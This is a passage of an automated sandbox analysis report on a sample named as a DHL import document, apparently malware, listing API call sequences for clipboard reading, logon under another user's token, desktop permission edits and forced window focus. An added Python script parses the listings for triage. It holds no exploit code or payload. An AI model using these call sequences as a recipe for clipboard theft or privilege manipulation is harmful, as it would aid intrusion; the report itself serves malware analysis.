                                                                                          • Opcode Fuzzy Hash: fe9fa8e8ae1e90928967aa06976b06e1ef2c9a3bb22c5153c7a3c12e49cded3d
                                                                                          • Instruction Fuzzy Hash: D4817C30208605DFCB15EF28C495A6AB7F1FF98314F05451EF8969B392DB34AD45CB92
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                          • Instruction ID: 172d13c0d88e2bd1e3c5ed467e234763476cd620020adebdac059e6b90c9bad8
                                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                          • Instruction Fuzzy Hash: 83E0BF7494010DEFDB00EFA8D5496DE7BB8EF04711F1005A1FD05E7681DB309E548A62
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,00000000,008124E0), ref: 007D6266
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 0b9a3c1d00f2e9938695669c52fdd61b42d8110f6828669126f4b60a13cb9dda
                                                                                          • Instruction ID: fd7919276b426e54e0a76aeac946b48ad22bbc7e603e44dec8f2b1c66108ec44
                                                                                          • Opcode Fuzzy Hash: 0b9a3c1d00f2e9938695669c52fdd61b42d8110f6828669126f4b60a13cb9dda
                                                                                          • Instruction Fuzzy Hash: 91E09975800B01CEC3318F1AE804422FBF9FEE13613218A2FD0E692668D3B4688A8B50
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction ID: e3ec2d84062ddd449cb3bc911ad6423c6deb0e57f421ffdd2aa66b6b76f8a3f2
                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction Fuzzy Hash: 57E0E67494010DDFDB00EFB8D5496DE7FB4EF04701F1001A1FD01E2281D6309D508A62
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0086961A
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086965B
                                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0086969F
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008696C9
                                                                                          • SendMessageW.USER32 ref: 008696F2
                                                                                          • GetKeyState.USER32(00000011), ref: 0086978B
                                                                                          • GetKeyState.USER32(00000009), ref: 00869798
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008697AE
                                                                                          • GetKeyState.USER32(00000010), ref: 008697B8
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008697E9
                                                                                          • SendMessageW.USER32 ref: 00869810
                                                                                          • SendMessageW.USER32(?,00001030,?,00867E95), ref: 00869918
                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0086992E
                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00869941
                                                                                          • SetCapture.USER32(?), ref: 0086994A
                                                                                          • ClientToScreen.USER32(?,?), ref: 008699AF
                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008699BC
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008699D6
                                                                                          • ReleaseCapture.USER32 ref: 008699E1
                                                                                          • GetCursorPos.USER32(?), ref: 00869A19
                                                                                          • ScreenToClient.USER32(?,?), ref: 00869A26
                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00869A80
                                                                                          • SendMessageW.USER32 ref: 00869AAE
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00869AEB
                                                                                          • SendMessageW.USER32 ref: 00869B1A
                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00869B3B
                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00869B4A
                                                                                          • GetCursorPos.USER32(?), ref: 00869B68
                                                                                          • ScreenToClient.USER32(?,?), ref: 00869B75
                                                                                          • GetParent.USER32(?), ref: 00869B93
                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00869BFA
                                                                                          • SendMessageW.USER32 ref: 00869C2B
                                                                                          • ClientToScreen.USER32(?,?), ref: 00869C84
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00869CB4
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00869CDE
                                                                                          • SendMessageW.USER32 ref: 00869D01
                                                                                          • ClientToScreen.USER32(?,?), ref: 00869D4E
                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00869D82
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00869E05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                          • String ID: @GUI_DRAGID$F
                                                                                          • API String ID: 3429851547-4164748364
                                                                                          • Opcode ID: 5cf5d8492e02e3d0b7bc200b4e294be61fbe6a9825391d670e43a56248ee2540
                                                                                          • Instruction ID: c525c95453595bd94f38b1f4602081a2d2b42d793b4bab554a3914b5922c0598
                                                                                          • Opcode Fuzzy Hash: 5cf5d8492e02e3d0b7bc200b4e294be61fbe6a9825391d670e43a56248ee2540
                                                                                          • Instruction Fuzzy Hash: B8428A34204301AFDB25CF68CC48AAABBE9FF59314F16061DF699C72E1E771A854CB52
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008648F3
                                                                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00864908
                                                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00864927
                                                                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0086494B
                                                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0086495C
                                                                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0086497B
                                                                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008649AE
                                                                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008649D4
                                                                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00864A0F
                                                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00864A56
                                                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00864A7E
                                                                                          • IsMenu.USER32(?), ref: 00864A97
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00864AF2
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00864B20
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00864B94
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00864BE3
                                                                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00864C82
                                                                                          • wsprintfW.USER32 ref: 00864CAE
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00864CC9
                                                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00864CF1
                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00864D13
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00864D33
                                                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00864D5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                          • String ID: %d/%02d/%02d
                                                                                          • API String ID: 4054740463-328681919
                                                                                          • Opcode ID: 0b41424236ada983d01f0e288ce0cbe4cdee53e3e6d960c63bc41b06f0dcc607
                                                                                          • Instruction ID: a0cf3361160af4ead32918ef43f68584f96086cbe01a235896d4715168894324
                                                                                          • Opcode Fuzzy Hash: 0b41424236ada983d01f0e288ce0cbe4cdee53e3e6d960c63bc41b06f0dcc607
                                                                                          • Instruction Fuzzy Hash: F512FD71600258ABEB248F28DC49FBE7BB8FF45714F115129F616EB2A1DBB89940CB50
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 007EF998
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0082F474
                                                                                          • IsIconic.USER32(00000000), ref: 0082F47D
                                                                                          • ShowWindow.USER32(00000000,00000009), ref: 0082F48A
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F494
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4AA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0082F4B1
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4BD
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4CE
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4D6
                                                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0082F4DE
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F4E1
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F4F6
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F501
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F50B
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F510
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F519
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F51E
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F528
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F52D
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F530
                                                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0082F557
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 4125248594-2988720461
                                                                                          • Opcode ID: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
                                                                                          • Instruction ID: 5646bfa8be6ade8438d342914d56a947a78c19cf88c1d8b0aa9b6ac715d27a96
                                                                                          • Opcode Fuzzy Hash: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
                                                                                          • Instruction Fuzzy Hash: EA315071A40228BAEB206FB5AC4AFBF7E7CFB44B50F111026F741E61D1C6F15940EA64
                                                                                          APIs
                                                                                            • Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                            • Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                            • Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A
                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00831286
                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008312A8
                                                                                          • CloseHandle.KERNEL32(?), ref: 008312B9
                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008312D1
                                                                                          • GetProcessWindowStation.USER32 ref: 008312EA
                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 008312F4
                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00831310
                                                                                            • Part of subcall function 008310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
                                                                                            • Part of subcall function 008310BF: CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                          • String ID: $default$winsta0
                                                                                          • API String ID: 22674027-1027155976
                                                                                          • Opcode ID: b359a7350ac231458a59beee5a3fbbc59399dc712414c7d458098b191f29a815
                                                                                          • Instruction ID: f4aeaafb53e7152c4d48de5faca211e36b1a79760e791d071b173e7925fb953f
                                                                                          • Opcode Fuzzy Hash: b359a7350ac231458a59beee5a3fbbc59399dc712414c7d458098b191f29a815
                                                                                          • Instruction Fuzzy Hash: B9818B71900208ABDF219FA8DC49FFE7BBAFF44B04F144129F910E62A0CB758944CBA5
                                                                                          APIs
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
                                                                                            • Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
                                                                                            • Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
                                                                                            • Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830BCC
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830C00
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830C17
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00830C51
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830C6D
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830C84
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830C8C
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00830C93
                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830CB4
                                                                                          • CopySid.ADVAPI32(00000000), ref: 00830CBB
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830CEA
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830D0C
                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830D1E
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D45
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D4C
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D55
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D5C
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D65
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D6C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00830D78
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D7F
                                                                                            • Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
                                                                                            • Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
                                                                                            • Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 4175595110-0
                                                                                          • Opcode ID: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
                                                                                          • Instruction ID: 103724a3d66a339885514939d7bf3c3650fb586e437dead000d8927085f89a01
                                                                                          • Opcode Fuzzy Hash: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
                                                                                          • Instruction Fuzzy Hash: 57715A7290020AABEF10DFA4DC48FAEBBB8FF45300F154655E954E6291D7B5AA05CFA0
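The four listings around this point (the AttachThreadInput/keybd_event forced-foreground routine, the LogonUserW/DuplicateTokenEx/OpenWindowStationW/OpenDesktopW logon routine, the window-station DACL edit above, and the OpenClipboard/GetClipboardData routine that follows) are the kind of API sequences a triager reads by eye. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses the report's "• Name.MODULE(args), ref: ADDR" entry format (including the indented "Part of subcall function" lines) into ordered call records, matches them against a small set of ordered call-pattern signatures that are my own illustrative mapping rather than the sandbox's signature engine, and decodes the clipboard-format and virtual-key constants visible in the arguments (0x0D = CF_UNICODETEXT, 0x01 = CF_TEXT, 0x0F = CF_HDROP, 0x12 = VK_MENU). The sample inputs are excerpts copied from the listings on this page.

```python
"""Triage helper for Joe Sandbox 'APIs' function listings (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# One listing entry, e.g.
#   • SendMessageW.USER32(?,00001012,00000000,?), ref: 00869A80
#   • ReleaseCapture.USER32 ref: 008699E1
#     • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple             # raw argument tokens as printed; "?" = unresolved
    ref: int                # call-site address
    subcall: Optional[str]  # callee the entry was hoisted from, if any


def parse_api_lines(text: str) -> list:
    """Parse a listing into ApiCall records, keeping the report's order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:           # "APIs", "Strings", "Memory Dump Source", ...
            continue
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def contains_in_order(calls, names) -> bool:
    """True if every name occurs in `calls` in the given relative order."""
    it = iter(c.name for c in calls)
    return all(n in it for n in names)


# Author's own mapping of ordered Win32 call patterns to behaviour; this is
# not Joe Sandbox's signature engine and the labels are illustrative.
SIGNATURES = {
    "forced foreground (AttachThreadInput + synthetic keystroke)":
        ("AttachThreadInput", "keybd_event", "SetForegroundWindow"),
    "logon as another user, switch window station/desktop (RunAs-style)":
        ("LogonUserW", "DuplicateTokenEx", "OpenWindowStationW",
         "SetProcessWindowStation", "OpenDesktopW"),
    "window station/desktop DACL edited to grant a SID access":
        ("GetUserObjectSecurity", "GetSecurityDescriptorDacl", "AddAce",
         "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
    "clipboard read":
        ("OpenClipboard", "IsClipboardFormatAvailable", "GetClipboardData",
         "GlobalLock"),
}


def classify(calls) -> list:
    return [label for label, seq in SIGNATURES.items()
            if contains_in_order(calls, seq)]


CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}
VK_NAMES = {0x12: "VK_MENU"}  # ALT; extend as needed


def _first_arg_hex(calls, api) -> list:
    """First argument of every resolved call to `api`, as an int."""
    return [int(c.args[0], 16) for c in calls
            if c.name == api and c.args and c.args[0] != "?"]


def clipboard_formats_read(calls) -> list:
    """Clipboard formats requested through GetClipboardData, decoded."""
    return [CLIPBOARD_FORMATS.get(f, f"0x{f:X}")
            for f in _first_arg_hex(calls, "GetClipboardData")]


def injected_keys(calls) -> list:
    """Virtual-key codes pushed through keybd_event, decoded."""
    return [VK_NAMES.get(v, f"0x{v:X}")
            for v in _first_arg_hex(calls, "keybd_event")]


# Excerpts of the listings in this report, used as sample input.
SAMPLE_FOREGROUND = """\
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 007EF998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0082F474
• SetForegroundWindow.USER32(00000000), ref: 0082F494
• GetCurrentThreadId.KERNEL32 ref: 0082F4B1
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4CE
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F4F6
• keybd_event.USER32(00000012,00000000), ref: 0082F501
• SetForegroundWindow.USER32(00000000), ref: 0082F530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 0082F557
"""
SAMPLE_CLIPBOARD = """\
• OpenClipboard.USER32(0086CC08), ref: 0084EB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0084EB37
• GetClipboardData.USER32(0000000D), ref: 0084EB43
• GlobalLock.KERNEL32(00000000), ref: 0084EB87
• GetClipboardData.USER32(00000001), ref: 0084EBD1
• GetClipboardData.USER32(0000000F), ref: 0084EC44
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0084EC77
• CloseClipboard.USER32 ref: 0084ED59
"""
SAMPLE_DACL = """\
  • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830BCC
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830C6D
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830D1E
"""

if __name__ == "__main__":
    for title, sample in (("foreground", SAMPLE_FOREGROUND),
                          ("clipboard", SAMPLE_CLIPBOARD),
                          ("dacl", SAMPLE_DACL)):
        calls = parse_api_lines(sample)
        print(title, classify(calls), clipboard_formats_read(calls),
              injected_keys(calls))
```

Two caveats when reading the output. First, the report's verdict that the sample is a compiled AutoIt script means, in my assessment, that these routines are the interpreter's own built-ins (forcing a window active, running as another user, reading the clipboard) that ship in every AutoIt-compiled binary; their presence says what the runtime can do, and the embedded script decides what is actually called, so a match here is a lead for the dynamic-behaviour section, not proof on its own. Second, the signatures only check relative order of names; arguments marked "?" are unresolved by the sandbox's static pass, so decoders like clipboard_formats_read skip them rather than guess.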
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(0086CC08), ref: 0084EB29
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0084EB37
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0084EB43
                                                                                          • CloseClipboard.USER32 ref: 0084EB4F
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EB87
                                                                                          • CloseClipboard.USER32 ref: 0084EB91
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084EBBC
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0084EBC9
                                                                                          • GetClipboardData.USER32(00000001), ref: 0084EBD1
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EBE2
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084EC22
                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0084EC38
                                                                                          • GetClipboardData.USER32(0000000F), ref: 0084EC44
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EC55
                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0084EC77
                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084EC94
                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084ECD2
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084ECF3
                                                                                          • CountClipboardFormats.USER32 ref: 0084ED14
                                                                                          • CloseClipboard.USER32 ref: 0084ED59
                                                                                          Memory Dump Source
